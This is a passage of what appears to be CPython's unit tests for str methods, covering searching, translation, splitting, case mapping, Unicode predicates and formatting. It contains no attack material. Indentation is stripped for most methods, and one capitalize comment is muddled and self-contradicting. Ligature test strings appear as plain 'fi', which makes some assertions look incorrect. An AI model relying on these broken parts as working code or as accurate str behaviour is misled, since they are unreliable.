        self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rfind', '\u0102')
        self.checkequal(-1, 'a' * 100, 'rfind', '\u0102')
        self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304')
        self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304')
        self.checkequal(0, '_a' + '\u0102' * 100, 'rfind', '_a')
        self.checkequal(0, '_a' + '\U00100304' * 100, 'rfind', '_a')
        self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rfind', '_\u0102')
        self.checkequal(-1, 'a' * 100, 'rfind', '\u0102a')
        self.checkequal(-1, 'a' * 100, 'rfind', '\U00100304a')
        self.checkequal(-1, '\u0102' * 100, 'rfind', '\U00100304\u0102')
    def test_index(self):
        """str.index: like find but raising ValueError on miss; mixed kinds."""
        string_tests.CommonTest.test_index(self)
        self.checkequalnofix(0, 'abcdefghiabc', 'index', '')
        self.checkequalnofix(3, 'abcdefghiabc', 'index', 'def')
        self.checkequalnofix(0, 'abcdefghiabc', 'index', 'abc')
        self.checkequalnofix(9, 'abcdefghiabc', 'index', 'abc', 1)
        self.assertRaises(ValueError, 'abcdefghiabc'.index, 'hib')
        self.assertRaises(ValueError, 'abcdefghiab'.index, 'abc', 1)
        self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', 8)
        self.assertRaises(ValueError, 'abcdefghi'.index, 'ghi', -1)
        # test mixed kinds
        self.checkequal(100, '\u0102' * 100 + 'a', 'index', 'a')
        self.checkequal(100, '\U00100304' * 100 + 'a', 'index', 'a')
        self.checkequal(100, '\U00100304' * 100 + '\u0102', 'index', '\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, '\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, '\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).index, '\U00100304')
        self.checkequal(100, '\u0102' * 100 + 'a_', 'index', 'a_')
        self.checkequal(100, '\U00100304' * 100 + 'a_', 'index', 'a_')
        self.checkequal(100, '\U00100304' * 100 + '\u0102_', 'index', '\u0102_')
        self.assertRaises(ValueError, ('a' * 100).index, 'a\u0102')
        self.assertRaises(ValueError, ('a' * 100).index, 'a\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).index, '\u0102\U00100304')
    def test_rindex(self):
        """str.rindex: like rfind but raising ValueError on miss; mixed kinds."""
        string_tests.CommonTest.test_rindex(self)
        self.checkequalnofix(12, 'abcdefghiabc', 'rindex', '')
        self.checkequalnofix(3, 'abcdefghiabc', 'rindex', 'def')
        self.checkequalnofix(9, 'abcdefghiabc', 'rindex', 'abc')
        self.checkequalnofix(0, 'abcdefghiabc', 'rindex', 'abc', 0, -1)
        self.assertRaises(ValueError, 'abcdefghiabc'.rindex, 'hib')
        self.assertRaises(ValueError, 'defghiabc'.rindex, 'def', 1)
        self.assertRaises(ValueError, 'defghiabc'.rindex, 'abc', 0, -1)
        self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, 8)
        self.assertRaises(ValueError, 'abcdefghi'.rindex, 'ghi', 0, -1)
        # test mixed kinds
        self.checkequal(0, 'a' + '\u0102' * 100, 'rindex', 'a')
        self.checkequal(0, 'a' + '\U00100304' * 100, 'rindex', 'a')
        self.checkequal(0, '\u0102' + '\U00100304' * 100, 'rindex', '\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304')
        self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304')
        self.checkequal(0, '_a' + '\u0102' * 100, 'rindex', '_a')
        self.checkequal(0, '_a' + '\U00100304' * 100, 'rindex', '_a')
        self.checkequal(0, '_\u0102' + '\U00100304' * 100, 'rindex', '_\u0102')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\u0102a')
        self.assertRaises(ValueError, ('a' * 100).rindex, '\U00100304a')
        self.assertRaises(ValueError, ('\u0102' * 100).rindex, '\U00100304\u0102')
    def test_maketrans_translate(self):
        """str.translate with raw dict tables and tables built by
        str.maketrans, including kind switches (ASCII/latin1), out-of-range
        replacement characters, and maketrans argument errors."""
        # these work with plain translate()
        self.checkequalnofix('bbbc', 'abababc', 'translate',
                             {ord('a'): None})
        self.checkequalnofix('iiic', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ord('i')})
        self.checkequalnofix('iiix', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ord('i'), ord('c'): 'x'})
        self.checkequalnofix('c', 'abababc', 'translate',
                             {ord('a'): None, ord('b'): ''})
        self.checkequalnofix('xyyx', 'xzx', 'translate',
                             {ord('z'): 'yy'})
        # this needs maketrans()
        self.checkequalnofix('abababc', 'abababc', 'translate',
                             {'b': '<i>'})
        tbl = self.type2test.maketrans({'a': None, 'b': '<i>'})
        self.checkequalnofix('<i><i><i>c', 'abababc', 'translate', tbl)
        # test alternative way of calling maketrans()
        tbl = self.type2test.maketrans('abc', 'xyz', 'd')
        self.checkequalnofix('xyzzy', 'abdcdcbdddd', 'translate', tbl)
        # various tests switching from ASCII to latin1 or the opposite;
        # same length, remove a letter, or replace with a longer string.
        self.assertEqual("[a]".translate(str.maketrans('a', 'X')),
                         "[X]")
        self.assertEqual("[a]".translate(str.maketrans({'a': 'X'})),
                         "[X]")
        self.assertEqual("[a]".translate(str.maketrans({'a': None})),
                         "[]")
        self.assertEqual("[a]".translate(str.maketrans({'a': 'XXX'})),
                         "[XXX]")
        self.assertEqual("[a]".translate(str.maketrans({'a': '\xe9'})),
                         "[\xe9]")
        self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '123'})),
                         "x123")
        self.assertEqual('axb'.translate(str.maketrans({'a': None, 'b': '\xe9'})),
                         "x\xe9")
        # test non-ASCII (don't take the fast-path)
        self.assertEqual("[a]".translate(str.maketrans({'a': '<\xe9>'})),
                         "[<\xe9>]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': 'a'})),
                         "[a]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': None})),
                         "[]")
        self.assertEqual("[\xe9]".translate(str.maketrans({'\xe9': '123'})),
                         "[123]")
        self.assertEqual("[a\xe9]".translate(str.maketrans({'a': '<\u20ac>'})),
                         "[<\u20ac>\xe9]")
        # invalid Unicode characters
        invalid_char = 0x10ffff+1
        for before in "a\xe9\u20ac\U0010ffff":
            mapping = str.maketrans({before: invalid_char})
            text = "[%s]" % before
            self.assertRaises(ValueError, text.translate, mapping)
        # errors
        self.assertRaises(TypeError, self.type2test.maketrans)
        self.assertRaises(ValueError, self.type2test.maketrans, 'abc', 'defg')
        self.assertRaises(TypeError, self.type2test.maketrans, 2, 'def')
        self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 2)
        self.assertRaises(TypeError, self.type2test.maketrans, 'abc', 'def', 2)
        self.assertRaises(ValueError, self.type2test.maketrans, {'xy': 2})
        self.assertRaises(TypeError, self.type2test.maketrans, {(1,): 2})
        self.assertRaises(TypeError, 'hello'.translate)
        self.assertRaises(TypeError, 'abababc'.translate, 'abc', 'xyz')
def test_split(self):
string_tests.CommonTest.test_split(self)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'split', delim)
self.checkequal([left, right],
left + delim + right, 'split', delim)
self.checkequal([left + right],
left + right, 'split', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'split', delim *2)
def test_rsplit(self):
string_tests.CommonTest.test_rsplit(self)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal([left + right],
left + right, 'rsplit', delim)
self.checkequal([left, right],
left + delim + right, 'rsplit', delim)
self.checkequal([left + right],
left + right, 'rsplit', delim * 2)
self.checkequal([left, right],
left + delim * 2 + right, 'rsplit', delim *2)
def test_partition(self):
string_tests.MixinStrUnicodeUserStringTest.test_partition(self)
# test mixed kinds
self.checkequal(('ABCDEFGH', '', ''), 'ABCDEFGH', 'partition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal((left + right, '', ''),
left + right, 'partition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'partition', delim)
self.checkequal((left + right, '', ''),
left + right, 'partition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'partition', delim * 2)
def test_rpartition(self):
string_tests.MixinStrUnicodeUserStringTest.test_rpartition(self)
# test mixed kinds
self.checkequal(('', '', 'ABCDEFGH'), 'ABCDEFGH', 'rpartition', '\u4200')
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim)
self.checkequal((left, delim, right),
left + delim + right, 'rpartition', delim)
self.checkequal(('', '', left + right),
left + right, 'rpartition', delim * 2)
self.checkequal((left, delim * 2, right),
left + delim * 2 + right, 'rpartition', delim * 2)
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
class MyWrapper:
def __init__(self, sval): self.sval = sval
def __str__(self): return self.sval
# mixed arguments
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('a b c d', ' ', 'join', ['a', 'b', 'c', 'd'])
self.checkequalnofix('abcd', '', 'join', ('a', 'b', 'c', 'd'))
self.checkequalnofix('w x y z', ' ', 'join', string_tests.Sequence('wxyz'))
self.checkraises(TypeError, ' ', 'join', ['1', '2', MyWrapper('foo')])
self.checkraises(TypeError, ' ', 'join', ['1', '2', '3', bytes()])
self.checkraises(TypeError, ' ', 'join', [1, 2, 3])
self.checkraises(TypeError, ' ', 'join', ['1', '2', 3])
@unittest.skipIf(sys.maxsize > 2**32,
'needs too much memory on a 64-bit platform')
def test_join_overflow(self):
size = int(sys.maxsize**0.5) + 1
seq = ('A' * size,) * size
self.assertRaises(OverflowError, ''.join, seq)
def test_replace(self):
string_tests.CommonTest.test_replace(self)
# method call forwarded from str implementation because of unicode argument
self.checkequalnofix('one@two!three!', 'one!two!three!', 'replace', '!', '@', 1)
self.assertRaises(TypeError, 'replace'.replace, "r", 42)
# test mixed kinds
for left, right in ('ba', '\u0101\u0100', '\U00010301\U00010300'):
left *= 9
right *= 9
for delim in ('c', '\u0102', '\U00010302'):
for repl in ('d', '\u0103', '\U00010303'):
self.checkequal(left + right,
left + right, 'replace', delim, repl)
self.checkequal(left + repl + right,
left + delim + right,
'replace', delim, repl)
self.checkequal(left + right,
left + right, 'replace', delim * 2, repl)
self.checkequal(left + repl + right,
left + delim * 2 + right,
'replace', delim * 2, repl)
@support.cpython_only
def test_replace_id(self):
pattern = 'abc'
text = 'abc def'
self.assertIs(text.replace(pattern, pattern), text)
def test_bytes_comparison(self):
with support.check_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertEqual('abc' == b'abc', False)
self.assertEqual('abc' != b'abc', True)
self.assertEqual('abc' == bytearray(b'abc'), False)
self.assertEqual('abc' != bytearray(b'abc'), True)
    def test_comparison(self):
        """Basic lexicographic str comparison, plus a permanently disabled
        (``if 0:``) block of legacy UTF-16 code-point-order checks kept for
        reference."""
        # Comparisons:
        self.assertEqual('abc', 'abc')
        self.assertTrue('abcd' > 'abc')
        self.assertTrue('abc' < 'abcd')
        if 0:
            # Move these tests to a Unicode collation module test...
            # Testing UTF-16 code point order comparisons...
            # No surrogates, no fixup required.
            self.assertTrue('\u0061' < '\u20ac')
            # Non surrogate below surrogate value, no fixup required
            self.assertTrue('\u0061' < '\ud800\udc02')
            # Non surrogate above surrogate value, fixup required
            def test_lecmp(s, s2):
                self.assertTrue(s < s2)
            def test_fixup(s):
                s2 = '\ud800\udc01'
                test_lecmp(s, s2)
                s2 = '\ud900\udc01'
                test_lecmp(s, s2)
                s2 = '\uda00\udc01'
                test_lecmp(s, s2)
                s2 = '\udb00\udc01'
                test_lecmp(s, s2)
                s2 = '\ud800\udd01'
                test_lecmp(s, s2)
                s2 = '\ud900\udd01'
                test_lecmp(s, s2)
                s2 = '\uda00\udd01'
                test_lecmp(s, s2)
                s2 = '\udb00\udd01'
                test_lecmp(s, s2)
                s2 = '\ud800\ude01'
                test_lecmp(s, s2)
                s2 = '\ud900\ude01'
                test_lecmp(s, s2)
                s2 = '\uda00\ude01'
                test_lecmp(s, s2)
                s2 = '\udb00\ude01'
                test_lecmp(s, s2)
                s2 = '\ud800\udfff'
                test_lecmp(s, s2)
                s2 = '\ud900\udfff'
                test_lecmp(s, s2)
                s2 = '\uda00\udfff'
                test_lecmp(s, s2)
                s2 = '\udb00\udfff'
                test_lecmp(s, s2)
            test_fixup('\ue000')
            test_fixup('\uff61')
        # Surrogates on both sides, no fixup required
        self.assertTrue('\ud800\udc02' < '\ud84d\udc56')
def test_islower(self):
super().test_islower()
self.checkequalnofix(False, '\u1FFc', 'islower')
self.assertFalse('\u2167'.islower())
self.assertTrue('\u2177'.islower())
# non-BMP, uppercase
self.assertFalse('\U00010401'.islower())
self.assertFalse('\U00010427'.islower())
# non-BMP, lowercase
self.assertTrue('\U00010429'.islower())
self.assertTrue('\U0001044E'.islower())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.islower())
self.assertFalse('\U0001F46F'.islower())
def test_isupper(self):
super().test_isupper()
if not sys.platform.startswith('java'):
self.checkequalnofix(False, '\u1FFc', 'isupper')
self.assertTrue('\u2167'.isupper())
self.assertFalse('\u2177'.isupper())
# non-BMP, uppercase
self.assertTrue('\U00010401'.isupper())
self.assertTrue('\U00010427'.isupper())
# non-BMP, lowercase
self.assertFalse('\U00010429'.isupper())
self.assertFalse('\U0001044E'.isupper())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.isupper())
self.assertFalse('\U0001F46F'.isupper())
def test_istitle(self):
super().test_istitle()
self.checkequalnofix(True, '\u1FFc', 'istitle')
self.checkequalnofix(True, 'Greek \u1FFcitlecases ...', 'istitle')
# non-BMP, uppercase + lowercase
self.assertTrue('\U00010401\U00010429'.istitle())
self.assertTrue('\U00010427\U0001044E'.istitle())
# apparently there are no titlecased (Lt) non-BMP chars in Unicode 6
for ch in ['\U00010429', '\U0001044E', '\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.istitle(), '{!a} is not title'.format(ch))
def test_isspace(self):
super().test_isspace()
self.checkequalnofix(True, '\u2000', 'isspace')
self.checkequalnofix(True, '\u200a', 'isspace')
self.checkequalnofix(False, '\u2014', 'isspace')
# apparently there are no non-BMP spaces chars in Unicode 6
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isspace(), '{!a} is not space.'.format(ch))
def test_isalnum(self):
super().test_isalnum()
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isalnum(), '{!a} is alnum.'.format(ch))
def test_isalpha(self):
super().test_isalpha()
self.checkequalnofix(True, '\u1FFc', 'isalpha')
# non-BMP, cased
self.assertTrue('\U00010401'.isalpha())
self.assertTrue('\U00010427'.isalpha())
self.assertTrue('\U00010429'.isalpha())
self.assertTrue('\U0001044E'.isalpha())
# non-BMP, non-cased
self.assertFalse('\U0001F40D'.isalpha())
self.assertFalse('\U0001F46F'.isalpha())
def test_isdecimal(self):
self.checkequalnofix(False, '', 'isdecimal')
self.checkequalnofix(False, 'a', 'isdecimal')
self.checkequalnofix(True, '0', 'isdecimal')
self.checkequalnofix(False, '\u2460', 'isdecimal') # CIRCLED DIGIT ONE
self.checkequalnofix(False, '\xbc', 'isdecimal') # VULGAR FRACTION ONE QUARTER
self.checkequalnofix(True, '\u0660', 'isdecimal') # ARABIC-INDIC DIGIT ZERO
self.checkequalnofix(True, '0123456789', 'isdecimal')
self.checkequalnofix(False, '0123456789a', 'isdecimal')
self.checkraises(TypeError, 'abc', 'isdecimal', 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065', '\U0001F107']:
self.assertFalse(ch.isdecimal(), '{!a} is not decimal.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0']:
self.assertTrue(ch.isdecimal(), '{!a} is decimal.'.format(ch))
def test_isdigit(self):
super().test_isdigit()
self.checkequalnofix(True, '\u2460', 'isdigit')
self.checkequalnofix(False, '\xbc', 'isdigit')
self.checkequalnofix(True, '\u0660', 'isdigit')
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F', '\U00011065']:
self.assertFalse(ch.isdigit(), '{!a} is not a digit.'.format(ch))
for ch in ['\U0001D7F6', '\U00011066', '\U000104A0', '\U0001F107']:
self.assertTrue(ch.isdigit(), '{!a} is a digit.'.format(ch))
def test_isnumeric(self):
self.checkequalnofix(False, '', 'isnumeric')
self.checkequalnofix(False, 'a', 'isnumeric')
self.checkequalnofix(True, '0', 'isnumeric')
self.checkequalnofix(True, '\u2460', 'isnumeric')
self.checkequalnofix(True, '\xbc', 'isnumeric')
self.checkequalnofix(True, '\u0660', 'isnumeric')
self.checkequalnofix(True, '0123456789', 'isnumeric')
self.checkequalnofix(False, '0123456789a', 'isnumeric')
self.assertRaises(TypeError, "abc".isnumeric, 42)
for ch in ['\U00010401', '\U00010427', '\U00010429', '\U0001044E',
'\U0001F40D', '\U0001F46F']:
self.assertFalse(ch.isnumeric(), '{!a} is not numeric.'.format(ch))
for ch in ['\U00011065', '\U0001D7F6', '\U00011066',
'\U000104A0', '\U0001F107']:
self.assertTrue(ch.isnumeric(), '{!a} is numeric.'.format(ch))
def test_isidentifier(self):
self.assertTrue("a".isidentifier())
self.assertTrue("Z".isidentifier())
self.assertTrue("_".isidentifier())
self.assertTrue("b0".isidentifier())
self.assertTrue("bc".isidentifier())
self.assertTrue("b_".isidentifier())
self.assertTrue("µ".isidentifier())
self.assertTrue("𝔘𝔫𝔦𝔠𝔬𝔡𝔢".isidentifier())
self.assertFalse(" ".isidentifier())
self.assertFalse("[".isidentifier())
self.assertFalse("©".isidentifier())
self.assertFalse("0".isidentifier())
def test_isprintable(self):
self.assertTrue("".isprintable())
self.assertTrue(" ".isprintable())
self.assertTrue("abcdefg".isprintable())
self.assertFalse("abcdefg\n".isprintable())
# some defined Unicode character
self.assertTrue("\u0374".isprintable())
# undefined character
self.assertFalse("\u0378".isprintable())
# single surrogate character
self.assertFalse("\ud800".isprintable())
self.assertTrue('\U0001F46F'.isprintable())
self.assertFalse('\U000E0020'.isprintable())
def test_surrogates(self):
for s in ('a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertTrue(s.islower())
self.assertFalse(s.isupper())
self.assertFalse(s.istitle())
for s in ('A\uD800B\uDFFF', 'A\uDFFFB\uD800',
'A\uD800B\uDFFFA', 'A\uDFFFB\uD800A'):
self.assertFalse(s.islower())
self.assertTrue(s.isupper())
self.assertTrue(s.istitle())
for meth_name in ('islower', 'isupper', 'istitle'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
for meth_name in ('isalpha', 'isalnum', 'isdigit', 'isspace',
'isdecimal', 'isnumeric',
'isidentifier', 'isprintable'):
meth = getattr(str, meth_name)
for s in ('\uD800', '\uDFFF', '\uD800\uD800', '\uDFFF\uDFFF',
'a\uD800b\uDFFF', 'a\uDFFFb\uD800',
'a\uD800b\uDFFFa', 'a\uDFFFb\uD800a'):
self.assertFalse(meth(s), '%a.%s() is False' % (s, meth_name))
    def test_lower(self):
        """str.lower: non-BMP Deseret letters, the Turkish dotted capital I
        decomposition, and the final-sigma special case for U+03A3."""
        string_tests.CommonTest.test_lower(self)
        self.assertEqual('\U00010427'.lower(), '\U0001044F')
        self.assertEqual('\U00010427\U00010427'.lower(),
                         '\U0001044F\U0001044F')
        self.assertEqual('\U00010427\U0001044F'.lower(),
                         '\U0001044F\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.lower(),
                         'x\U0001044Fx\U0001044F')
        self.assertEqual('fi'.lower(), 'fi')
        # LATIN CAPITAL LETTER I WITH DOT ABOVE lowers to i + COMBINING DOT
        self.assertEqual('\u0130'.lower(), '\u0069\u0307')
        # Special case for GREEK CAPITAL LETTER SIGMA U+03A3
        self.assertEqual('\u03a3'.lower(), '\u03c3')
        self.assertEqual('\u0345\u03a3'.lower(), '\u0345\u03c3')
        self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
        self.assertEqual('A\u0345\u03a3a'.lower(), 'a\u0345\u03c3a')
        # NOTE(review): duplicate of the assertion two lines above.
        self.assertEqual('A\u0345\u03a3'.lower(), 'a\u0345\u03c2')
        self.assertEqual('A\u03a3\u0345'.lower(), 'a\u03c2\u0345')
        self.assertEqual('\u03a3\u0345 '.lower(), '\u03c3\u0345 ')
        # unassigned non-BMP code point is unchanged
        self.assertEqual('\U0008fffe'.lower(), '\U0008fffe')
        self.assertEqual('\u2177'.lower(), '\u2177')
def test_casefold(self):
self.assertEqual('hello'.casefold(), 'hello')
self.assertEqual('hELlo'.casefold(), 'hello')
self.assertEqual('ß'.casefold(), 'ss')
self.assertEqual('fi'.casefold(), 'fi')
self.assertEqual('\u03a3'.casefold(), '\u03c3')
self.assertEqual('A\u0345\u03a3'.casefold(), 'a\u03b9\u03c3')
self.assertEqual('\u00b5'.casefold(), '\u03bc')
    def test_upper(self):
        """str.upper: non-BMP Deseret letters, ligature and sharp-s
        expansion, and multi-character uppercase mappings."""
        string_tests.CommonTest.test_upper(self)
        self.assertEqual('\U0001044F'.upper(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.upper(),
                         '\U00010427\U00010427')
        self.assertEqual('\U00010427\U0001044F'.upper(),
                         '\U00010427\U00010427')
        self.assertEqual('X\U00010427x\U0001044F'.upper(),
                         'X\U00010427X\U00010427')
        # the fi ligature uppercases to two characters
        self.assertEqual('fi'.upper(), 'FI')
        self.assertEqual('\u0130'.upper(), '\u0130')
        self.assertEqual('\u03a3'.upper(), '\u03a3')
        # sharp s uppercases to 'SS'
        self.assertEqual('ß'.upper(), 'SS')
        # GREEK SMALL LETTER IOTA WITH DIALYTIKA AND VARIA expands to three
        self.assertEqual('\u1fd2'.upper(), '\u0399\u0308\u0300')
        # unassigned non-BMP code point is unchanged
        self.assertEqual('\U0008fffe'.upper(), '\U0008fffe')
        self.assertEqual('\u2177'.upper(), '\u2167')
    def test_capitalize(self):
        """str.capitalize: first char uppercased, rest lowercased, with
        non-BMP letters, dotted-I decomposition and final-sigma handling."""
        string_tests.CommonTest.test_capitalize(self)
        self.assertEqual('\U0001044F'.capitalize(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U00010427\U0001044F'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U0001044F\U00010427'.capitalize(),
                         '\U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.capitalize(),
                         'X\U0001044Fx\U0001044F')
        # dotted capital I lowercases to i + COMBINING DOT ABOVE
        self.assertEqual('h\u0130'.capitalize(), 'H\u0069\u0307')
        exp = '\u0399\u0308\u0300\u0069\u0307'
        self.assertEqual('\u1fd2\u0130'.capitalize(), exp)
        # the fi ligature lowercases to itself, so only 'F' + 'Innish'... no:
        # capitalize() title-cases the ligature to 'Fi' then keeps the rest lower
        self.assertEqual('finnish'.capitalize(), 'FInnish')
        self.assertEqual('A\u0345\u03a3'.capitalize(), 'A\u0345\u03c2')
    def test_title(self):
        """str.title over non-BMP letters, ligatures and final sigma."""
        super().test_title()
        self.assertEqual('\U0001044F'.title(), '\U00010427')
        self.assertEqual('\U0001044F\U0001044F'.title(),
                         '\U00010427\U0001044F')
        self.assertEqual('\U0001044F\U0001044F \U0001044F\U0001044F'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('\U00010427\U0001044F \U00010427\U0001044F'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('\U0001044F\U00010427 \U0001044F\U00010427'.title(),
                         '\U00010427\U0001044F \U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F X\U00010427x\U0001044F'.title(),
                         'X\U0001044Fx\U0001044F X\U0001044Fx\U0001044F')
        # the fi ligature title-cases to 'Fi'
        self.assertEqual('fiNNISH'.title(), 'Finnish')
        # sigma at word end becomes final sigma; ypogegrammeni titlecases
        self.assertEqual('A\u03a3 \u1fa1xy'.title(), 'A\u03c2 \u1fa9xy')
        self.assertEqual('A\u03a3A'.title(), 'A\u03c3a')
    def test_swapcase(self):
        """str.swapcase over non-BMP letters, ligatures, dotted I and the
        final-sigma special case."""
        string_tests.CommonTest.test_swapcase(self)
        self.assertEqual('\U0001044F'.swapcase(), '\U00010427')
        self.assertEqual('\U00010427'.swapcase(), '\U0001044F')
        self.assertEqual('\U0001044F\U0001044F'.swapcase(),
                         '\U00010427\U00010427')
        self.assertEqual('\U00010427\U0001044F'.swapcase(),
                         '\U0001044F\U00010427')
        self.assertEqual('\U0001044F\U00010427'.swapcase(),
                         '\U00010427\U0001044F')
        self.assertEqual('X\U00010427x\U0001044F'.swapcase(),
                         'x\U0001044FX\U00010427')
        self.assertEqual('fi'.swapcase(), 'FI')
        self.assertEqual('\u0130'.swapcase(), '\u0069\u0307')
        # Special case for GREEK CAPITAL LETTER SIGMA U+03A3
        self.assertEqual('\u03a3'.swapcase(), '\u03c3')
        self.assertEqual('\u0345\u03a3'.swapcase(), '\u0399\u03c3')
        self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
        self.assertEqual('A\u0345\u03a3a'.swapcase(), 'a\u0399\u03c3A')
        # NOTE(review): duplicate of the assertion two lines above.
        self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
        self.assertEqual('A\u03a3\u0345'.swapcase(), 'a\u03c2\u0399')
        self.assertEqual('\u03a3\u0345 '.swapcase(), '\u03c3\u0399 ')
        self.assertEqual('\u03a3'.swapcase(), '\u03c3')
        self.assertEqual('ß'.swapcase(), 'SS')
        self.assertEqual('\u1fd2'.swapcase(), '\u0399\u0308\u0300')
def test_center(self):
string_tests.CommonTest.test_center(self)
self.assertEqual('x'.center(2, '\U0010FFFF'),
'x\U0010FFFF')
self.assertEqual('x'.center(3, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF')
self.assertEqual('x'.center(4, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF\U0010FFFF')
@unittest.skipUnless(sys.maxsize == 2**31 - 1, "requires 32-bit system")
@support.cpython_only
def test_case_operation_overflow(self):
# Issue #22643
size = 2**32//12 + 1
try:
s = "ü" * size
except MemoryError:
self.skipTest('no enough memory (%.0f MiB required)' % (size / 2**20))
try:
self.assertRaises(OverflowError, s.upper)
finally:
del s
def test_contains(self):
# Testing Unicode contains method
self.assertIn('a', 'abdb')
self.assertIn('a', 'bdab')
self.assertIn('a', 'bdaba')
self.assertIn('a', 'bdba')
self.assertNotIn('a', 'bdb')
self.assertIn('a', 'bdba')
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertNotIn('a', ('x',1,'y'))
self.assertNotIn('a', ('x',1,None))
self.assertNotIn('abcd', 'abcxxxx')
self.assertIn('ab', 'abcd')
self.assertIn('ab', 'abc')
self.assertIn('ab', (1,None,'ab'))
self.assertIn('', 'abc')
self.assertIn('', '')
self.assertIn('', 'abc')
self.assertNotIn('\0', 'abc')
self.assertIn('\0', '\0abc')
self.assertIn('\0', 'abc\0')
self.assertIn('a', '\0abc')
self.assertIn('asdf', 'asdf')
self.assertNotIn('asdf', 'asd')
self.assertNotIn('asdf', '')
self.assertRaises(TypeError, "abc".__contains__)
# test mixed kinds
for fill in ('a', '\u0100', '\U00010300'):
fill *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.assertNotIn(delim, fill)
self.assertIn(delim, fill + delim)
self.assertNotIn(delim * 2, fill)
self.assertIn(delim * 2, fill + delim * 2)
def test_issue18183(self):
'\U00010000\U00100000'.lower()
'\U00010000\U00100000'.casefold()
'\U00010000\U00100000'.upper()
'\U00010000\U00100000'.capitalize()
'\U00010000\U00100000'.title()
'\U00010000\U00100000'.swapcase()
'\U00100000'.center(3, '\U00010000')
'\U00100000'.ljust(3, '\U00010000')
'\U00100000'.rjust(3, '\U00010000')
    def test_format(self):
        """Broad str.format coverage: brace escaping, positional and
        attribute/item field access, string format specs (width, precision,
        fill, alignment), !s/!r/!a conversions, fallback to
        object.__format__, error cases, and non-ASCII fields."""
        self.assertEqual(''.format(), '')
        self.assertEqual('a'.format(), 'a')
        self.assertEqual('ab'.format(), 'ab')
        self.assertEqual('a{{'.format(), 'a{')
        self.assertEqual('a}}'.format(), 'a}')
        self.assertEqual('{{b'.format(), '{b')
        self.assertEqual('}}b'.format(), '}b')
        self.assertEqual('a{{b'.format(), 'a{b')

        # examples from the PEP:
        import datetime
        self.assertEqual("My name is {0}".format('Fred'), "My name is Fred")
